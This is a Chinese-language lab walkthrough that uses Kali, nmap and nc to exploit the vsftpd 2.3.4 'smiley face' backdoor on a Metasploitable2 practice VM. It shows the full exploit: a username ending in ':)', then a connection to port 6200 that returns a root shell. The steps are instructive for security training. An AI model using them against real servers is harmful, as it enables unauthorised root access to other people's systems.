VSFTPD v2.3.4版本存在一个著名的笑脸漏洞,也称为后门,即用户名中存在“:)”标志的用户可以通过后门获得访问权限,今天我们来实际操作如何利用笑脸漏洞获得访问权限。
- 开启kali虚拟机,并确保靶机开启确保网络连通性,使用ifconfig命令查看虚拟机的IP kali:192.168.5.255
- 使用nmap扫描靶机及其端口,输入命令nmap 192.168.5.0/24回车扫描, 靶机metasploitable2 IP:192.168.5.129, 并且靶机的tcp21端口处于开放状态,提供的SERVICE是ftp
- 我们进一步用nmap对靶机进行扫描,-sV命令用来探测服务版本信息
nmap -sV 192.168.5.129回车
扫描到21端口运行ftp协议的服务器版本为vsftpd 2.3.4,是存在笑脸漏洞的版本这时候我们就可以对靶机进行攻击了。
使用nc扫描6200端口,“Connection refused”,没有权限。
- nc靶机21端口,进行TCP连接,
nc 192.168.5.129 21回车,收到回复220 (vsFTPd 2.3.4)
输入带有“:)”的user,例如user a:)
回车收到回复“please specify the password”,输入密码pass,例如pass 111回车
这时候我们再次nc6200端口,输入“whoami”,我们可以看到这时候我们的权限变成了root,说明连接成功



